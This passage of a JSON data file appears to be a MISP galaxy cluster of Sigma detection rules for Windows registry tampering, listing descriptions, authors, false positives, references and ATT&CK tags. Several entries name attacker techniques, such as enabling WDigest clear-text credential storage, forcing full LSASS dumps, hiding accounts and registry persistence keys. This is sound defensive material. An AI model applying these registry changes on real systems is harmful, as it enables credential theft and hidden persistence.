{ "authors": [ "@Joseliyo_Jstnk" ], "category": "rules", "description": "MISP galaxy cluster based on Sigma Rules.", "name": "Sigma-Rules", "source": "https://github.com/jstnk9/MISP/tree/main/misp-galaxy/sigma", "type": "sigma-rules", "uuid": "9cf7cd2e-d5f1-48c4-9909-7896ba1c96b2", "values": [ { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_currentversion.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", "value": "CurrentVersion Autorun Keys Modification" }, { "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate use" ], "filename": "registry_set_treatas_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=3gz1QmiMhss&t=1251s", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_treatas_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1546.015" ] }, "related": [ { "dest-uuid": "bc0f5e80-91c0-4e04-9fbb-e4e332c85dae", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "value": "COM Hijacking via TreatAs" }, { "description": "Detects the addition of the \"Debugger\" value to the \"DbgManagedDebugger\" key in order to achieve persistence. Which will get invoked when an application crashes", "meta": { "author": "frack113", "creation_date": "2022-08-07", "falsepositive": [ "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "filename": "registry_set_dbgmanageddebugger_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", "https://github.com/last-byte/PersistenceSniper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml" ], "tags": [ "attack.persistence", "attack.t1574" ] }, "related": [ { "dest-uuid": "aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9827ae57-3802-418f-994b-d5ecf5cd974b", "value": "Potential Registry Persistence Attempt Via DbgManagedDebugger" }, { "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "registry_set_policies_attachments_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "value": "Potential Attachment Manager Settings Attachments Tamper" }, { "description": "Detects .NET Framework CLR and .NET Core CLR \"cor_enable_profiling\" and \"cor_profiler\" variables being set and configured.", "meta": { "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)", "creation_date": "2020-09-10", "falsepositive": "No established falsepositives", "filename": "registry_set_enabling_cor_profiler_env_variables.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sans.org/cyber-security-summit/archives", "https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling", "https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors", "https://twitter.com/jamieantisocial/status/1304520651248668673", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.defense-evasion", "attack.t1574.012" ] }, "related": [ { "dest-uuid": "ffeb0780-356e-4261-b036-cfb6bd234335", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad89044a-8f49-4673-9a55-cbd88a1b374f", "value": "Enabling COR Profiler Environment Variables" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", "value": "System Scripts Autorun Keys Modification" }, { "description": "Detects changes to the registry values related to outlook security settings", "meta": { "author": "frack113", "creation_date": "2021-12-28", "falsepositive": [ "Administrative activity" ], "filename": "registry_set_office_outlook_security_settings.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", "https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "value": "Outlook Security Settings Updated - Registry" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b29aed60-ebd1-442b-9cb5-16a1d0324adb", "value": "Wow6432Node CurrentVersion Autorun Keys Modification" }, { "description": "This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "registry_set_wab_dllpath_reg_change.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml", "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/", "https://twitter.com/Hexacorn/status/991447379864932352", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fc014922-5def-4da9-a0fc-28c973f41bfb", "value": "Execution DLL of Choice Using WAB.EXE" }, { "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Unlikely" ], "filename": "registry_set_exploit_guard_susp_allowed_apps.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42205c73-75c8-4a63-9db1-e3782e06fda0", "value": "Suspicious Application Allowed Through Exploit Guard" }, { "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-30", "falsepositive": [ "Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment." ], "filename": "registry_set_persistence_custom_protocol_handler.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "value": "Potential Persistence Via Custom Protocol Handler" }, { "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "filename": "registry_set_aedebug_persistence.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/aedebug.html", "https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "092af964-4233-4373-b4ba-d86ea2890288", "value": "Add Debugger Entry To AeDebug For Persistence" }, { "description": "Detects registry value settings that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ)", "creation_date": "2023-12-21", "falsepositive": [ "Administrative scripts that change the desktop background to a company logo or other image." ], "filename": "registry_set_desktop_background_change.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1112", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "85b88e05-dadc-430b-8a9e-53ff1cd30aae", "value": "Potentially Suspicious Desktop Background Change Via Registry" }, { "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot.\n", "meta": { "author": "frack113", "creation_date": "2023-01-27", "falsepositive": [ "Installers and updaters may set currently in use files for rename or deletion after a reboot." ], "filename": "registry_set_susp_pendingfilerenameoperations.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6", "https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html", "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN", "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", "value": "Potential PendingFileRenameOperations Tampering" }, { "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", "meta": { "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "creation_date": "2018-04-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_globalflags.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_globalflags.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.defense-evasion", "attack.t1546.012", "car.2013-01-002" ] }, "related": [ { "dest-uuid": "6d4a7fb3-5a24-42be-ae61-6728a2b581f6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36803969-5421-41ec-b92f-8500f79c23b0", "value": "Potential Persistence Via GlobalFlags" }, { "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-01", "falsepositive": [ "Unlikely" ], "filename": "registry_set_policies_associations_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", "value": "Potential Attachment Manager Settings Associations Tamper" }, { "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "creation_date": "2022-07-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_special_accounts.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.002" ] }, "related": [ { "dest-uuid": "8c4aef43-48d5-49aa-b2af-c0cd58d30c3d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "value": "Hiding User Account Via SpecialAccounts Registry Key" }, { "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community", "creation_date": "2018-07-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_susp_reg_persist_explorer_run.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b7916c2a-fa2f-4795-9477-32b731f70f11", "value": "Registry Persistence via Explorer Run Key" }, { "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\n", "meta": { "author": "Wojciech Lesicki", "creation_date": "2021-06-29", "falsepositive": [ "Unlikely" ], "filename": "registry_set_cobaltstrike_service_installs.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "61a7697c-cb79-42a8-a2ff-5f0cdfae0130", "value": "Potential CobaltStrike Service Installations - Registry" }, { "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "registry_set_lsa_disablerestrictedadmin.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", "value": "RestrictedAdminMode Registry Value Tampering" }, { "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", "meta": { "author": "@pbssubhash", "creation_date": "2022-12-08", "falsepositive": [ "Legitimate application that needs to do a full dump of their process" ], "filename": "registry_set_lsass_usermode_dumping.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/deepinstinct/Lsass-Shtinkering", "https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "value": "Lsass Full Dump Request Via DumpType Registry Settings" }, { "description": "Detects changes to the \"DisableHypervisorEnforcedPagingTranslation\" registry value. Where the it is set to \"1\" in order to disable the Hypervisor Enforced Paging Translation feature.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-07-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf", "https://twitter.com/standa_t/status/1808868985678803222", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_deviceguard_hypervisorenforcedpagingtranslation_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7f2954d2-99c2-4d42-a065-ca36740f187b", "value": "Hypervisor Enforced Paging Translation Disabled" }, { "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2019-09-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_wdigest_enable_uselogoncredential.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/73fcfa1d4863f6a4e17f90e54401de6e30a312bb/atomics/T1112/T1112.md#atomic-test-3---modify-registry-to-store-logon-credentials", "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649", "https://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", "value": "Wdigest Enable UseLogonCredential" }, { "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", "meta": { "author": "Dimitrios Slamaris", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "registry_set_dhcp_calloutdll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", "attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d3436ef-9476-4c43-acca-90ce06bdf33a", "value": "DHCP Callout DLL Installation" }, { "description": "Detects potential persistence activity via outlook today page.\nAn attacker can set a custom page to execute arbitrary code and link to it via the registry values \"URL\" and \"UserDefinedUrl\".\n", "meta": { "author": "Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand", "creation_date": "2021-06-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_outlook_todaypage.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74", "https://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_todaypage.yml" ], "tags": [ "attack.persistence", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", "value": "Potential Persistence Via Outlook Today Page" }, { "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "This rule is to explore new applications on an endpoint. False positives depends on the organization.", "Newly setup system.", "Legitimate installation of new application." ], "filename": "registry_set_new_application_appcompat.yml", "level": "informational", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md", "https://github.com/OTRF/detection-hackathon-apt29/issues/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" ], "tags": [ "attack.execution", "attack.t1204.002" ] }, "related": [ { "dest-uuid": "232b7f21-adf9-4b42-b936-b9d6f7df856e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" 